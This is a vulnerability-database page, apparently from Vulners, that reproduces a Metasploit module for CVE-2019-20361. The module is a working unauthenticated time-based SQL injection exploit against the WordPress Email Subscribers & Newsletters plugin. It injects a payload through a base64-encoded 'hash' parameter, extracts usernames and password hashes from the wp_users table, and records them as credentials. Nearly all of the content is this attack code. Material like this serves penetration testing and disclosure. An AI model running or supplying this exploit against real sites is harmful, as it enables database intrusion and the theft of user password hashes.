Vulners
Lucene search
WordPress Email Subscribers and Newsletter Hash SQLi Scanner
🗓️ 09 Dec 2020 17:41:42Reported by h00die, red0xff, WordfenceType 
metasploit🔗 www.rapid7.com👁 101 Views
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | WordPress Email Subscribers & Newsletters 4.2.2 Plugin - (hash) SQL Injection (Unauthenticated) | 27 Jul 202000:00 | – | zdt |
 | CVE-2019-20361 | 8 Jan 202000:00 | – | attackerkb |
 | Exploit for SQL Injection in Icegram Email_Subscribers_\&_Newsletters | 18 Mar 202100:22 | – | githubexploit |
 | CVE-2019-20361 | 9 Dec 202015:35 | – | circl |
 | WordPress Email Subscribers & Newsletters SQL Injection Vulnerability | 8 Jan 202000:00 | – | cnvd |
 | CVE-2019-20361 | 8 Jan 202005:03 | – | cve |
 | CVE-2019-20361 | 8 Jan 202005:03 | – | cvelist |
 | WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated) | 26 Jul 202000:00 | – | exploitdb |
 | CVE-2019-20361 | 8 Jan 202006:15 | – | nvd |
 | WordPress Email Subscribers And Newsletters 4.2.2 SQL Injection | 27 Jul 202000:00 | – | packetstorm |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Auxiliary::Scanner
include Msf::Exploit::SQLi
def initialize(info = {})
super(
update_info(
info,
'Name' => 'WordPress Email Subscribers and Newsletter Hash SQLi Scanner',
'Description' => %q{
Email Subscribers & Newsletters plugin contains an unauthenticated timebased SQL injection in
versions before 4.3.1. The hash parameter is vulnerable to injection.
},
'Author' => [
'h00die', # msf module
'red0xff', # sqli libs in msf
'Wordfence' # blog post says team, no individual(s) called out for discovery
],
'License' => MSF_LICENSE,
'References' => [
[ 'EDB', '48699' ],
[ 'CVE', '2019-20361' ],
[ 'URL', 'https://www.wordfence.com/blog/2019/11/multiple-vulnerabilities-patched-in-email-subscribers-newsletters-plugin/' ]
],
'Actions' => [
['List Users', { 'Description' => 'Queries username, password hash for COUNT users' }],
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [],
'SideEffects' => [IOC_IN_LOGS]
},
'DefaultAction' => 'List Users',
'DisclosureDate' => '2019-11-13'
)
)
register_options [
OptInt.new('COUNT', [false, 'Number of users to enumerate', 1])
]
end
def run_host(ip)
unless wordpress_and_online?
fail_with Failure::NotVulnerable, 'Server not online or not detected as wordpress'
end
checkcode = check_plugin_version_from_readme('email-subscribers', '4.3.1')
unless [Msf::Exploit::CheckCode::Vulnerable, Msf::Exploit::CheckCode::Appears, Msf::Exploit::CheckCode::Detected].include?(checkcode)
fail_with Failure::NotVulnerable, 'Email Subscribers and Newsletter version not vulnerable'
end
print_good('Vulnerable version of Email Subscribers and Newsletter detected')
guid = Rex::Text.rand_guid
email = Rex::Text.rand_mail_address
@sqli = create_sqli(dbms: MySQLi::TimeBasedBlind) do |payload|
data = %|{"contact_id":"100','100','100','3'),('1594999398','1594999398','1',(1) AND #{payload},'100','100','3'),|
data << %|('1594999398','1594999398','1','100","campaign_id":"100","message_id":"100","email":"#{email}","guid":"#{guid}","action":"open"}|
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'vars_get' => {
'hash' => Base64.strict_encode64(data),
'es' => 'open'
}
})
fail_with Failure::Unreachable, 'Connection failed' unless res
end
unless @sqli.test_vulnerable
fail_with Failure::PayloadFailed, "#{peer} - Testing of SQLi failed. If this is time based, try increasing SqliDelay."
end
columns = ['user_login', 'user_pass']
results = @sqli.dump_table_fields('wp_users', columns, '', datastore['COUNT'])
table = Rex::Text::Table.new('Header' => 'wp_users', 'Indent' => 1, 'Columns' => columns)
results.each do |user|
create_credential({
workspace_id: myworkspace_id,
origin_type: :service,
module_fullname: fullname,
username: user[0],
private_type: :nonreplayable_hash,
jtr_format: Metasploit::Framework::Hashes.identify_hash(user[1]),
private_data: user[1],
service_name: 'Wordpress',
address: ip,
port: datastore['RPORT'],
protocol: 'tcp',
status: Metasploit::Model::Login::Status::UNTRIED
})
table << user
end
print_good(table.to_s)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Jan 2026 18:57Current
8.7High risk
Vulners AI Score8.7
CVSS 27.5
CVSS 3.19.8
CVSS 38.3
EPSS0.8511